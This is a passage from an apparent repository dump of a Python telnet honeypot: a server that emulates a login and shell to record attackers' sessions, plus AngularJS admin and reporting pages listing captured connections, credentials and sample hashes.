    "content": "import struct\nimport socket\nimport traceback\nimport time\n\nfrom thread import start_new_thread\n\nfrom session import Session\nfrom util.dbg import dbg\nfrom util.config import config\n\nclass IPFilter:\n\n\tdef __init__(self):\n\t\tself.map = {}\n\t\tself.timeout = config.get(\"telnet_ip_min_time_between_connections\")\n\n\tdef add_ip(self, ip):\n\t\tself.map[ip] = time.time()\n\n\tdef is_allowed(self, ip):\n\t\tself.clean()\n\t\treturn not(ip in self.map)\n\n\tdef clean(self):\n\n\t\ttodelete = []\n\n\t\tfor ip in self.map:\n\t\t\tif self.map[ip] + self.timeout < time.time():\n\t\t\t\ttodelete.append(ip)\n\n\t\tfor ip in todelete:\n\t\t\tdel self.map[ip]\n\nclass Telnetd:\n\tcmds   = {}\n\tcmds[240] = \"SE   - subnegoation end\"\n\tcmds[241] = \"NOP  - no operation\"\n\tcmds[242] = \"DM   - data mark\"\n\tcmds[243] = \"BRK  - break\"\n\tcmds[244] = \"IP   - interrupt process\"\n\tcmds[245] = \"AO   - abort output\"\n\tcmds[246] = \"AYT  - are you there\"\n\tcmds[247] = \"EC   - erase char\"\n\tcmds[248] = \"EL   - erase line\"\n\tcmds[249] = \"GA   - go ahead\"\n\tcmds[250] = \"SB   - subnegotiation\"\n\tcmds[251] = \"WILL - positive return\"\n\tcmds[252] = \"WONT - negative return\"\n\tcmds[253] = \"DO   - set option\"\n\tcmds[254] = \"DONT - unset option\"\n\tcmds[255] = \"IAC  - interpret as command\"\n\n\tSE   = 240\n\tNOP  = 241\n\tDM   = 242\n\tBRK  = 243\n\tIP   = 244\n\tAO   = 245\n\tAYT  = 246\n\tEC   = 247\n\tEL   = 248\n\tGA   = 249\n\tSB   = 250\n\tWILL = 251\n\tWONT = 252\n\tDO   = 253\n\tDONT = 254\n\tIAC  = 255\n\n\t# Options\n\tNAWS = 31\n\n\tdef __init__(self, addr, port):\n\t\tself.host     = addr\n\t\tself.port     = port\n\t\tself.sock     = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\t\tself.do_run   = True\n\t\tself.ipfilter = IPFilter()\n\n\tdef run(self):\n\t\tself.sock.bind((self.host, self.port))\n\t\tself.sock.listen(10)\n\t\tself.sock.settimeout(None)\n\t\tdbg(\"Socket open on \" + str(self.host) +  \":\" + 
str(self.port))\n\t\twhile self.do_run:\n\t\t\ttry:\n\t\t\t\tself.handle()\n\t\t\texcept:\n\t\t\t\ttraceback.print_exc()\n\t\tself.sock.close()\n\t\tdbg(\"Socket Closed\")\n\n\tdef handle(self):\n\t\tconn = False\n\t\ttry:\n\t\t\tconn, addr = self.sock.accept()\n\t\t\tdbg(\"Client connected at \" + str(addr))\n\t\t\t\n\t\t\tif self.ipfilter.is_allowed(addr[0]):\n\t\t\t\tself.ipfilter.add_ip(addr[0])\n\t\t\t\tsess = TelnetSess(self, conn, addr)\n\t\t\t\tstart_new_thread(sess.loop, ())\n\t\t\telse:\n\t\t\t\tdbg(\"Connection limit for \" + addr[0] + \" exceeded, closing\")\n\t\t\t\tconn.close()\n\t\texcept:\n\t\t\ttraceback.print_exc()\n\n\tdef stop(self):\n\t\tself.do_run = False\n\nclass TelnetSess:\n\tdef __init__(self, serv, sock, remote):\n\t\tself.serv    = serv\n\t\tself.sock    = sock\n\t\tself.timeout = config.get(\"telnet_session_timeout\")\n\t\tself.maxtime = config.get(\"telnet_max_session_length\")\n\t\tself.db_id   = 0\n\t\tself.remote  = remote\n\t\tself.session = None\n\n\tdef loop(self):\n\t\tself.session = Session(self.send_string, self.remote[0])\n\n\t\tdbg(\"Setting timeout to \" + str(self.timeout) + \" seconds\")\n\t\tself.sock.settimeout(self.timeout)\n\n\t\ttry:\n\t\t\tself.test_opt(1)\n\n\t\t\t# Kill of Session if longer than self.maxtime\n\t\t\tts_start = int(time.time())\n\n\t\t\tself.send_string(\"Login: \")\n\t\t\tu = self.recv_line()\n\t\t\tself.send_string(\"Password: \")\n\t\t\tp = self.recv_line()\n\n\t\t\tself.send_string(\"\\r\\nWelcome to EmbyLinux 3.13.0-24-generic\\r\\n\")\n\n\t\t\tself.session.login(u, p)\n\n\t\t\twhile True:\n\t\t\t\tl = self.recv_line()\n\n\t\t\t\ttry:\n\t\t\t\t\tself.session.shell(l)\n\t\t\t\texcept:\n\t\t\t\t\ttraceback.print_exc()\n\t\t\t\t\tself.send_string(\"sh: error\\r\\n\")\n\n\t\t\t\tif ts_start + self.maxtime < int(time.time()):\n\t\t\t\t\tdbg(\"Session too long. 
Killing off.\")\n\t\t\t\t\tbreak\n\n\t\texcept socket.timeout:\n\t\t\tdbg(\"Connection timed out\")\n\t\texcept EOFError:\n\t\t\tdbg(\"Connection closed\")\n\n\t\tself.session.end()\n\t\tself.sock.close()\n\n\tdef test_naws(self):\n\t\t#dbg(\"TEST NAWS\")\n\t\tself.test_opt(Telnetd.NAWS)\n\t\tself.need(Telnetd.IAC)\n\t\tbyte = self.recv()\n\t\tif byte == Telnetd.WILL:\n\t\t\tself.need(Telnetd.IAC)\n\t\t\tself.need(Telnetd.SB)\n\t\t\tself.need(Telnetd.NAWS)\n\n\t\t\tw = self.recv_short()\n\t\t\th = self.recv_short()\n\n\t\t\tself.need(Telnetd.IAC)\n\t\t\tself.need(Telnetd.SE)\n\n\t\t\t#dbg(\"TEST NAWS OK \" + str(w) + \"x\" + str(h))\n\t\telif byte == Telnetd.WONT:\n\t\t\tpass\n\t\t\t#dbg(\"TEST NAWS FAILED\")\n\t\telse:\n\t\t\traise ValueError()\n\n\tdef test_linemode(self):\n\t\t#dbg(\"TEST LINEMODE\")\n\t\tif self.test_opt(34):\n\t\t\tself.need(Telnetd.IAC)\n\t\t\tself.need(Telnetd.SE)\n\n\tdef test_opt(self, opt, do=True):\n\t\t#dbg(\"TEST \" + str(opt))\n\n\t\tself.send(Telnetd.IAC)\n\t\tif do:\n\t\t\tself.send(Telnetd.DO)\n\t\telse:\n\t\t\tself.send(Telnetd.DONT)\n\t\tself.send(opt)\n\n\tdef send(self, byte):\n\t\t#if byte in Telnetd.cmds:\n\t\t#\tdbg(\"SEND \" + str(Telnetd.cmds[byte]))\n\t\t#else:\n\t\t#\tdbg(\"SEND \" + str(byte))\n\t\tself.sock.send(chr(byte))\n\n\tdef send_string(self, msg):\n\t\tself.sock.send(msg)\n\t\t#dbg(\"SEND STRING LEN\" + str(len(msg)))\n\n\tdef recv(self):\n\t\tbyte = self.sock.recv(1)\n\t\tif len(byte) == 0:\n\t\t\traise EOFError\n\t\tbyte = ord(byte)\n\t\t#if byte in Telnetd.cmds:\n\t\t#\tdbg(\"RECV \" + str(Telnetd.cmds[byte]))\n\t\t#else:\n\t\t#\tdbg(\"RECV \" + str(byte))\n\t\treturn byte\n\n\tdef recv_line(self):\n\t\tline = \"\"\n\t\twhile True:\n\t\t\tbyte = self.recv()\n\t\t\tif byte == Telnetd.IAC:\n\t\t\t\tbyte = self.recv()\n\t\t\t\tself.process_cmd(byte)\n\t\t\telif byte == ord(\"\\r\"):\n\t\t\t\tpass\n\t\t\telif byte == ord(\"\\n\"):\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tline = line + chr(byte)\n\t\t#dbg(\"RECV STRING \" + line)\n\t\treturn line\n\n\tdef recv_short(self):\n\t\tbytes = self.sock.recv(2)\n\t\tshort = struct.unpack(\"!H\", bytes)[0]\n\t\t#dbg(\"RECV SHORT \" + str(short))\n\t\treturn short\n\n\tdef need(self, byte_need):\n\t\tbyte = self.recv()\n\t\tif byte != byte_need:\n\t\t\tdbg(\"BAD  \" + \"PROTOCOL ERROR. EXIT.\")\n\t\t\traise ValueError()\n\t\treturn byte\n\n\tdef process_cmd(self, cmd):\n\t\tif cmd == Telnetd.DO:\n\t\t\tbyte = self.recv()\n\t\t\tself.send(Telnetd.IAC)\n\t\t\tself.send(Telnetd.WONT)\n\t\t\tself.send(byte)\n\t\tif cmd == Telnetd.WILL or cmd == Telnetd.WONT:\n\t\t\tbyte = self.recv()\n\n"
  },
  {
    "path": "honeypot.py",
    "content": "import os\nimport sys\nimport signal\nimport json\nimport socket\n\nfrom honeypot.telnet      import Telnetd\nfrom honeypot.client      import Client\nfrom honeypot.session     import Session\nfrom honeypot.shell.shell import test_shell\n\nfrom util.dbg import dbg\nfrom util.config import config\n\nsrv = None\n\ndef import_file(fname):\n\twith open(fname, \"rb\") as fp:\n\t\tclient = Client()\n\t\tfor line in fp:\n\t\t\tline = line.strip()\n\t\t\tobj  = json.loads(line)\n\t\t\tif obj[\"type\"] == \"connection\":\n\t\t\t\tif obj[\"ip\"] != None:\n\t\t\t\t\tprint \"conn   \" + obj[\"ip\"]\n\t\t\t\t\tclient.put_session(obj)\n\t\t\tif obj[\"type\"] == \"sample\":\n\t\t\t\tprint \"sample \" + obj[\"sha256\"]\n\t\t\t\tclient.put_sample_info(obj)\n\t\t\t\t\ndef rerun_file(fname):\n\twith open(fname, \"rb\") as fp:\n\t\tfor line in fp:\n\t\t\tline = line.strip()\n\t\t\tobj  = json.loads(line)\n\t\t\tif obj[\"type\"] == \"connection\":\n\t\t\t\tif obj[\"ip\"] == None: continue\n\t\t\t\tsession = Session(sys.stdout.write, obj[\"ip\"])\n\t\t\t\tsession.login(obj[\"user\"], obj[\"pass\"])\n\t\t\t\tfor event in obj[\"stream\"]:\n\t\t\t\t\tif not(event[\"in\"]): continue\n\t\t\t\t\tsys.stdout.write(event[\"data\"])\t\t\n\t\t\t\t\tsession.shell(event[\"data\"].strip())\n\t\t\t\tsession.end()\n\n\ndef signal_handler(signal, frame):\n\tdbg('Ctrl+C')\n\tsrv.stop()\n\nif not os.path.exists(\"samples\"):\n\tos.makedirs(\"samples\")\n\nif __name__ == \"__main__\":\n\taction = None\n\tconfigFile = None\n\n\ti = 0\n\twhile i+1 < len(sys.argv):\n\t\ti += 1\t\t\n\t\targ = sys.argv[i]\n\t\t\n\t\tif arg == \"-c\":\n\t\t\tif i+1 < len(sys.argv):\n\t\t\t\tconfigFile = sys.argv[i+1]\n\t\t\t\tprint \"Using config file \" + configFile\n\t\t\t\ti += 1\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tprint \"warning: expected argument after \\\"-c\\\"\"\n\t\telse:\n\t\t\taction = arg\n\t\t\t\n\tif configFile:\n\t\tconfig.loadUserConfig(configFile)\n\t\n\tif action == 
None:\n\t\tsocket.setdefaulttimeout(15)\n\t\t\n\t\tsrv = Telnetd(config.get(\"telnet_addr\"), config.get(\"telnet_port\"))\n\t\tsignal.signal(signal.SIGINT, signal_handler)\n\t\tsrv.run()\n\telif action == \"import\":\n\t\tfname = sys.argv[2]\n\t\timport_file(fname)\n\telif action == \"rerun\":\n\t\tfname = sys.argv[2]\n\t\trerun_file(fname)\n\telif action == \"shell\":\n\t\ttest_shell()\n\telse:\n\t\tprint \"Command \" + action + \" unknown.\"\n\n"
  },
  {
    "path": "html/.gitignore",
    "content": "db.php\napiurl.js\n"
  },
  {
    "path": "html/admin.html",
    "content": "<img src=\"img/icon.svg\" style=\"height: 10em; margin-top: -4em; padding: 1em; background: white;\" class=\"pull-right\">\n\n<div class=\"page-header\">\n\t<h1>Administration Area</h1>\n</div>\n\n<div class=\"alert alert-info\" role=\"alert\" ng-show=\"errormsg\">{{ errormsg }}</div>\n<div ng-show=\"!loggedin\">\n  <h2>Login</h2>\n  <form>\n    <div class=\"form-group\">\n      <label for=\"username\">Username</label>\n      <input type=\"text\" class=\"form-control\" ng-model=\"username\" placeholder=\"Username\" id=\"username\">\n    </div>\n    <div class=\"form-group\">\n      <label for=\"password\">Password</label>\n      <input type=\"password\" class=\"form-control\" ng-model=\"password\" placeholder=\"Password\" id=\"password\">\n    </div>\n    <button type=\"submit\" class=\"btn btn-default\" ng-click=\"login()\">Login</button>\n  </form>\n</div>\n\n<div ng-show=\"loggedin\">\n  <h2>Add a new user</h2>\n  <form>\n    <div class=\"form-group\">\n      <label for=\"new_username\">New users name</label>\n      <input type=\"text\" class=\"form-control\" ng-model=\"new_username\" placeholder=\"Username\" id=\"new_username\">\n    </div>\n    <div class=\"form-group\">\n      <label for=\"new_password\">New users password</label>\n      <input type=\"password\" class=\"form-control\" ng-model=\"new_password\" placeholder=\"Password\" id=\"new_password\">\n    </div>\n    <button type=\"submit\" class=\"btn btn-default\" ng-click=\"addUser()\">Add User</button>\n  </form>\n  <hr>\n  <form>\n    <button type=\"submit\" class=\"btn btn-default btn-danger\" ng-click=\"logout()\">Logout</button>\n  </form>\n</div>\n\n"
  },
  {
    "path": "html/asn.html",
    "content": "<h1>ASN Info</h1>\n\n<table class=\"table\">\n\n\t<tr><td>Name</td><td><b>{{ asn.name }}</b></td></tr>\n\t<tr><td>Country</td><td><img src=\"img/flags/{{ asn.country.toLowerCase() }}.png\"> {{ asn.countryname }}</td></tr>\n\t<tr><td>ASN</td><td>AS{{ asn.asn }}</td></tr>\n\t<tr><td>Internet Registry</td><td>{{ REGISTRIES[asn.reg] }}</td></tr>\n\t<tr><td>More Info</td><td><a href=\"http://bgp.he.net/AS{{ asn.asn }}\" target=\"_blank\"><span class=\"glyphicon glyphicon-link\"></span> AS{{ asn.asn }} on bgp.he.net</a></td></tr>\n\n</table>\n\n<h2>Connections from AS{{ asn.asn }} <small><a href=\"#/connections?asn_id={{ asn.asn }}\">more</a></small></h2>\n\n<div ng-include=\"'connectionlist-embed.html'\"></div>\n\n<h2>URLs located in AS{{ asn.asn }}</h2>\n\n<table class=\"table\">\n\n\t<tr><th>Connections</th><th>Url</th><th>Sample</th></tr>\n\t<tr ng-repeat=\"url in asn.urls\"><td>{{ url.connections }}</td><td>{{ url.url }}</td><td>{{ url.sample }}</td></tr>\n\n</table>\n\n<small>Coming soon</small>\n"
  },
  {
    "path": "html/common.js",
    "content": "\nvar fakenames = [\"Boar\",\"Stallion\",\"Yak\",\"Beaver\",\"Salamander\",\"Eagle Owl\",\"Impala\",\"Elephant\",\"Chameleon\",\"Argali\",\"Lemur\",\"Addax\",\"Colt\",\"Whale\",\"Dormouse\",\"Budgerigar\",\"Dugong\",\"Squirrel\",\"Okapi\",\"Burro\",\"Fish\",\"Crocodile\",\"Finch\",\"Bison\",\"Gazelle\",\"Basilisk\",\"Puma\",\"Rooster\",\"Moose\",\"Musk Deer\",\"Thorny Devil\",\"Gopher\",\"Gnu\",\"Panther\",\"Porpoise\",\"Lamb\",\"Parakeet\",\"Marmoset\",\"Coati\",\"Alligator\",\"Elk\",\"Antelope\",\"Kitten\",\"Capybara\",\"Mule\",\"Mouse\",\"Civet\",\"Zebu\",\"Horse\",\"Bald Eagle\",\"Raccoon\",\"Pronghorn\",\"Parrot\",\"Llama\",\"Tapir\",\"Duckbill Platypus\",\"Cow\",\"Ewe\",\"Bighorn\",\"Hedgehog\",\"Crow\",\"Mustang\",\"Panda\",\"Otter\",\"Mare\",\"Goat\",\"Dingo\",\"Hog\",\"Mongoose\",\"Guanaco\",\"Walrus\",\"Springbok\",\"Dog\",\"Kangaroo\",\"Badger\",\"Fawn\",\"Octopus\",\"Buffalo\",\"Doe\",\"Camel\",\"Shrew\",\"Lovebird\",\"Gemsbok\",\"Mink\",\"Lynx\",\"Wolverine\",\"Fox\",\"Gorilla\",\"Silver Fox\",\"Wolf\",\"Ground Hog\",\"Meerkat\",\"Pony\",\"Highland Cow\",\"Mynah Bird\",\"Giraffe\",\"Cougar\",\"Eland\",\"Ferret\",\"Rhinoceros\"];\n\nfunction extractHash() {\n\tvar table  = {};\n\tvar values = window.location.hash.substr(1);\n\tvalues = values.split(\"&\");\n\tfor (var i = 0; i < values.length; i++) {\n\t\tvar tuple = values[i].split(\"=\");\n\t\tvar name  = tuple[0];\n\t\tvar value = tuple.length > 1 ? 
tuple[1] : null;\n\t\ttable[name] = value;\n\t}\n\treturn table;\n}\n\nfunction formatDate(date) {\n\td = new Date(date * 1000);\n\treturn d.toTimeString().replace(/.*(\\d{2}:\\d{2}:\\d{2}).*/, \"$1\");\n}\n\nvar months = [\"Jan\", \"Feb\", \"Mar\", \"Apr\", \"May\", \"Jun\", \"Jul\", \"Aug\", \"Sep\", \"Oct\", \"Nov\", \"Dec\"];\n\nfunction formatDay(date) {\n\td = new Date(date * 1000);\n\treturn d.getDate() + \" \" + months[d.getMonth()];\n}\n\nfunction formatDateTime(date) {\n\tif (date == null) return \"\";\n\td = new Date(date * 1000);\n\treturn d.getDate() + \".\" + (d.getMonth()+1) + \" \" + d.toTimeString().replace(/.*(\\d{2}:\\d{2}):\\d{2}.*/, \"$1\");\n}\n\nfunction time() {\n\treturn Math.round(new Date().getTime() / 1000);\n}\n\nfunction nicenull (str, el) {\n\tif (str == null || str == \"\")\n\t\treturn el;\n\telse\n\t\treturn str;\n}\n\nfunction short (str, l) {\n\tif (str)\n\t\treturn str.substring(0, l) + \"...\";\n\telse\n\t\treturn \"None\";\n}\n\nfunction encurl(url) {\n\treturn btoa(url);\n}\n\nfunction decurl(url) {\n\treturn atob(url);\n}\n"
  },
  {
    "path": "html/connection.html",
    "content": "<h1>Connection Info</h1>\n\n<table class=\"table\">\n\n\t<tr><td>Date</td><td>{{ formatDate(connection.date) }}</td></tr>\n\t<tr><td>Duration</td><td>{{ connection.duration }} seconds</td></tr>\n\t<tr><td>Network / Malware</td><td>\n\t\t<a href=\"#/network/{{ connection.network.id }}\">#{{ connection.network.id }}</a>\n\t\t<span> / </span>\n\t\t<a href=\"#/malware/{{ connection.network.malware.id }}\">{{ connection.network.malware.name != null ? connection.network.malware.name : fakenames[connection.network.malware.id] }}</a>\n\t</td></tr>\n\t<!-- <tr><td>ID</td><td>{{ connection.id }}</td></tr> -->\n\t<tr><td>Honeypot name</td><td>{{ connection.backend_user }}</td></tr>\n\t<tr>\n\t\t<td>IP</td>\n\t\t<td>\n\t\t\t<span ng-show=\"connection.asn\"><a href=\"#/connections?country={{ connection.country }}\"><span class=\"glyphicon glyphicon-screenshot\"></span></a> <img src=\"img/flags/{{ connection.country.toLowerCase() }}.png\"> {{ connection.city + ', ' + connection.countryname }} <a target=\"_blank\" href=\"http://www.openstreetmap.org/?zoom=13&lat={{ connection.latitude }}&lon={{ connection.longitude }}\">map</a> <br></span>\n\t\t\t<span><a href=\"#/connections?ip={{ connection.ip }}\"><span class=\"glyphicon glyphicon-screenshot\"></span></a></span> {{ connection.ip }}<br>\n\t\t\t<span ng-show=\"connection.asn\"><a href=\"#/asn/{{ connection.asn.asn }}\"><span class=\"glyphicon glyphicon-screenshot\"></span></a> AS{{ connection.asn.asn }} <b>{{ connection.asn.name }}</b>\n\t\t\t</span><br>\n\t\t\t<span ng-show=\"connection.asn\">{{ connection.ipblock }}</span>\n\t\t</td>\n\t</tr>\n\t<tr><td>User : Password</td><td><a href=\"#/connections?user={{ connection.user }}\"><span class=\"glyphicon glyphicon-screenshot\"></span> \"{{ connection.user }}\"</a> : <a href=\"#/connections?password={{ connection.password }}\">\"{{ connection.password }}\" <span class=\"glyphicon glyphicon-screenshot\"></span></a></td></tr>\n\t<tr 
ng-show=\"connection.conns_before.length > 0\">\n\t\t<td>Prior Connections</td>\n\t\t<td>\n\t\t\t<p ng-repeat=\"associate in connection.conns_before\">\n\t\t\t\t<a href=\"{{ '#/connection/' + associate.id }}\">{{ formatDate(associate.date) }}</a> from \n\t\t\t\t<img src=\"img/flags/{{ associate.country.toLowerCase() }}.png\"> {{ associate.ip }}\n\t\t\t</p>\n\t\t</td>\n\t</tr>\n    <tr ng-show=\"connection.conns_after.length > 0\">\n\t\t<td>Subsequent Connections</td>\n\t\t<td>\n\t\t\t<p ng-repeat=\"associate in connection.conns_after\">\n\t\t\t\t<a href=\"{{ '#/connection/' + associate.id }}\">{{ formatDate(associate.date) }}</a> from \n\t\t\t\t<img src=\"img/flags/{{ associate.country.toLowerCase() }}.png\"> {{ associate.ip }}\n\t\t\t</p>\n\t\t</td>\n\t</tr>\n    <tr ng-show=\"connection.tags.length > 0\">\n\t\t<td>Tags</td>\n\t\t<td>\n            <a class=\"btn btn-default btn-xs\" ng-repeat=\"tag in connection.tags\" style=\"margin-right: 1em;\" href=\"#/tag/{{ tag.name }}\" data-toggle=\"tooltip\" title=\"{{ tag.code }}\">{{ tag.name }}</a>\n\t\t</td>\n\t</tr>\n    \n\n</table>\n\n<div ng-show=\"connection.urls.length > 0\">\n\t<h2>URLs gathered</h2>\n\n\t<table class=\"table\">\n\n\t\t<tr>\n\t\t\t<th>Url</th>\n\t\t\t<th>First Seen</th>\n\t\t\t<th>Sample</th>\n\t\t</tr>\n\t\t<tr ng-repeat=\"url in connection.urls\">\n\t\t\t<td><a href=\"{{ '#/url/' + encurl(url.url) }}\">{{ url.url }}</a></td>\n\t\t\t<td>{{ formatDate(url.date) }}</td>\n\t\t\t<td><a href=\"{{ '#/sample/' + url.sample }}\">{{ short(url.sample, 16) }}</a></td>\n\t\t</tr>\n\n\t</table>\n</div>\n\n<div ng-show=\"connection.text_combined != ''\">\n\t<h2>Session text <small> show output <input type=\"checkbox\" ng-model=\"displayoutput\"></small></h2>\n\n\t<div class=\"well well-sm code\">\n\t\t<div style=\"font-size: 0.7em;\">Session Text does not include non-ascii characters</div>\n\t\t<span class=\"code-line\" ng-show=\"displayoutput || event.in\" ng-class=\"{ isinput: event.in }\" 
ng-repeat=\"event in connection.stream\" title=\"after {{ event.ts }} s\">{{ event.data }}</span>\n\t</div>\n</div>\n"
  },
  {
    "path": "html/connectionlist-embed.html",
"content": "<table class=\"table table-condensed\">\n\n\t<tr>\n\t\t<th>Date</th>\n\t\t<th ng-show=\"!filter['ip']\">IP</th>\n\t\t<th ng-show=\"!filter['asn_id']\">ASN</th>\n\t\t<th ng-show=\"!filter['country']\">Country</th>\n\t\t<th>Username</th>\n\t\t<th>Password</th>\n\t\t<th>N⁰ Urls</th>\n\t</tr>\n\t<tr ng-repeat=\"connection in connections\">\n\t\t<td><a href=\"{{ '#/connection/' + connection.id }}\">{{ formatDate(connection.date) }}</a></td>\n\t\t<td ng-show=\"!filter['ip']\"> {{ connection.ip }} <a href=\"#/connections?ip={{ connection.ip }}\"><span class=\"glyphicon glyphicon-screenshot\"></span></a></td>\n\t\t<td ng-show=\"!filter['asn_id']\">{{ connection.asn.asn }} <a href=\"#/asn/{{ connection.asn.asn }}\"><span class=\"glyphicon glyphicon-screenshot\"></span></a></td>\n\t\t<td ng-show=\"!filter['country']\"><img src=\"img/flags/{{ connection.country.toLowerCase() }}.png\">  {{ connection.country }} <a href=\"#/connections?country={{ connection.country }}\"><span class=\"glyphicon glyphicon-screenshot\"></span></a></td>\n\t\t<td>{{ connection.user }} <a href=\"#/connections?user={{ connection.user }}\"><span class=\"glyphicon glyphicon-screenshot\"></span></a></td>\n\t\t<td>{{ connection.password }} <a href=\"#/connections?password={{ connection.password }}\"><span class=\"glyphicon glyphicon-screenshot\"></span></a></td>\n\t\t<td>{{ connection.urls }}</td>\n\t</tr>\n\n</table>\n"
  },
  {
    "path": "html/connectionlist.html",
    "content": "<h2>Connections</h2>\n\n<div class=\"well well-sm\" style=\"font-family: monospace\">\n\t<div style=\"font-size: 0.7em;\">\n\t\tFilters:\n\t\t<button style=\"background:none; border:none; margin:0; padding:0;\" type=\"button\" data-toggle=\"collapse\" data-target=\"#collapseExample\" aria-expanded=\"false\" aria-controls=\"collapseExample\">\n\t\t\t<span class=\"glyphicon glyphicon-info-sign\"></span>\n\t\t</button>\n\t\t<div class=\"collapse\" id=\"collapseExample\">\n\t\t\t<p>You may use the url bar to edit filters</p>\n\t\t\t<p>Available arguments: [\"ipblock\", \"user\", \"password\", \"ip\", \"country\", \"asn_id\"]</p>\n\t\t</div>\n\t</div>\n\t<span ng-repeat=\"(k, v) in filter\">{{ k }} == <img ng-show=\"k == 'country'\" src=\"img/flags/{{ v.toLowerCase() }}.png\"> {{ v }} {{ k == 'country' ? '(' + COUNTRY_LIST[v] + ')' : '' }} {{ $last ? '' : ', ' }}</span>\n</div>\n\n<div ng-include=\"'connectionlist-embed.html'\"></div>\n\n<div class=\"pull-right\">\n\t<button type=\"button\" class=\"btn btn-default\" ng-click=\"nextpage()\">More &raquo;</button>\n</div>"
  },
  {
    "path": "html/countries.js",
    "content": "var COUNTRY_LIST = {\"AF\":\"Afghanistan\",\"AX\":\"Åland Islands\",\"AL\":\"Albania\",\"DZ\":\"Algeria\",\"AS\":\"American Samoa\",\"AD\":\"AndorrA\",\"AO\":\"Angola\",\"AI\":\"Anguilla\",\"AQ\":\"Antarctica\",\"AG\":\"Antigua and Barbuda\",\"AR\":\"Argentina\",\"AM\":\"Armenia\",\"AW\":\"Aruba\",\"AU\":\"Australia\",\"AT\":\"Austria\",\"AZ\":\"Azerbaijan\",\"BS\":\"Bahamas\",\"BH\":\"Bahrain\",\"BD\":\"Bangladesh\",\"BB\":\"Barbados\",\"BY\":\"Belarus\",\"BE\":\"Belgium\",\"BZ\":\"Belize\",\"BJ\":\"Benin\",\"BM\":\"Bermuda\",\"BT\":\"Bhutan\",\"BO\":\"Bolivia\",\"BA\":\"Bosnia and Herzegovina\",\"BW\":\"Botswana\",\"BV\":\"Bouvet Island\",\"BR\":\"Brazil\",\"IO\":\"British Indian Ocean Territory\",\"BN\":\"Brunei Darussalam\",\"BG\":\"Bulgaria\",\"BF\":\"Burkina Faso\",\"BI\":\"Burundi\",\"KH\":\"Cambodia\",\"CM\":\"Cameroon\",\"CA\":\"Canada\",\"CV\":\"Cape Verde\",\"KY\":\"Cayman Islands\",\"CF\":\"Central African Republic\",\"TD\":\"Chad\",\"CL\":\"Chile\",\"CN\":\"China\",\"CX\":\"Christmas Island\",\"CC\":\"Cocos (Keeling) Islands\",\"CO\":\"Colombia\",\"KM\":\"Comoros\",\"CG\":\"Congo\",\"CD\":\"Congo, The Democratic Republic of the\",\"CK\":\"Cook Islands\",\"CR\":\"Costa Rica\",\"CI\":\"Cote D'Ivoire\",\"HR\":\"Croatia\",\"CU\":\"Cuba\",\"CY\":\"Cyprus\",\"CZ\":\"Czech Republic\",\"DK\":\"Denmark\",\"DJ\":\"Djibouti\",\"DM\":\"Dominica\",\"DO\":\"Dominican Republic\",\"EC\":\"Ecuador\",\"EG\":\"Egypt\",\"SV\":\"El Salvador\",\"GQ\":\"Equatorial Guinea\",\"ER\":\"Eritrea\",\"EE\":\"Estonia\",\"ET\":\"Ethiopia\",\"FK\":\"Falkland Islands (Malvinas)\",\"FO\":\"Faroe Islands\",\"FJ\":\"Fiji\",\"FI\":\"Finland\",\"FR\":\"France\",\"GF\":\"French Guiana\",\"PF\":\"French Polynesia\",\"TF\":\"French Southern 
Territories\",\"GA\":\"Gabon\",\"GM\":\"Gambia\",\"GE\":\"Georgia\",\"DE\":\"Germany\",\"GH\":\"Ghana\",\"GI\":\"Gibraltar\",\"GR\":\"Greece\",\"GL\":\"Greenland\",\"GD\":\"Grenada\",\"GP\":\"Guadeloupe\",\"GU\":\"Guam\",\"GT\":\"Guatemala\",\"GG\":\"Guernsey\",\"GN\":\"Guinea\",\"GW\":\"Guinea-Bissau\",\"GY\":\"Guyana\",\"HT\":\"Haiti\",\"HM\":\"Heard Island and Mcdonald Islands\",\"VA\":\"Holy See (Vatican City State)\",\"HN\":\"Honduras\",\"HK\":\"Hong Kong\",\"HU\":\"Hungary\",\"IS\":\"Iceland\",\"IN\":\"India\",\"ID\":\"Indonesia\",\"IR\":\"Iran, Islamic Republic Of\",\"IQ\":\"Iraq\",\"IE\":\"Ireland\",\"IM\":\"Isle of Man\",\"IL\":\"Israel\",\"IT\":\"Italy\",\"JM\":\"Jamaica\",\"JP\":\"Japan\",\"JE\":\"Jersey\",\"JO\":\"Jordan\",\"KZ\":\"Kazakhstan\",\"KE\":\"Kenya\",\"KI\":\"Kiribati\",\"KP\":\"Korea, Democratic People'S Republic of\",\"KR\":\"Korea, Republic of\",\"KW\":\"Kuwait\",\"KG\":\"Kyrgyzstan\",\"LA\":\"Lao People'S Democratic Republic\",\"LV\":\"Latvia\",\"LB\":\"Lebanon\",\"LS\":\"Lesotho\",\"LR\":\"Liberia\",\"LY\":\"Libyan Arab Jamahiriya\",\"LI\":\"Liechtenstein\",\"LT\":\"Lithuania\",\"LU\":\"Luxembourg\",\"MO\":\"Macao\",\"MK\":\"Macedonia, The Former Yugoslav Republic of\",\"MG\":\"Madagascar\",\"MW\":\"Malawi\",\"MY\":\"Malaysia\",\"MV\":\"Maldives\",\"ML\":\"Mali\",\"MT\":\"Malta\",\"MH\":\"Marshall Islands\",\"MQ\":\"Martinique\",\"MR\":\"Mauritania\",\"MU\":\"Mauritius\",\"YT\":\"Mayotte\",\"MX\":\"Mexico\",\"FM\":\"Micronesia, Federated States of\",\"MD\":\"Moldova, Republic of\",\"MC\":\"Monaco\",\"MN\":\"Mongolia\",\"MS\":\"Montserrat\",\"MA\":\"Morocco\",\"MZ\":\"Mozambique\",\"MM\":\"Myanmar\",\"NA\":\"Namibia\",\"NR\":\"Nauru\",\"NP\":\"Nepal\",\"NL\":\"Netherlands\",\"AN\":\"Netherlands Antilles\",\"NC\":\"New Caledonia\",\"NZ\":\"New Zealand\",\"NI\":\"Nicaragua\",\"NE\":\"Niger\",\"NG\":\"Nigeria\",\"NU\":\"Niue\",\"NF\":\"Norfolk Island\",\"MP\":\"Northern Mariana 
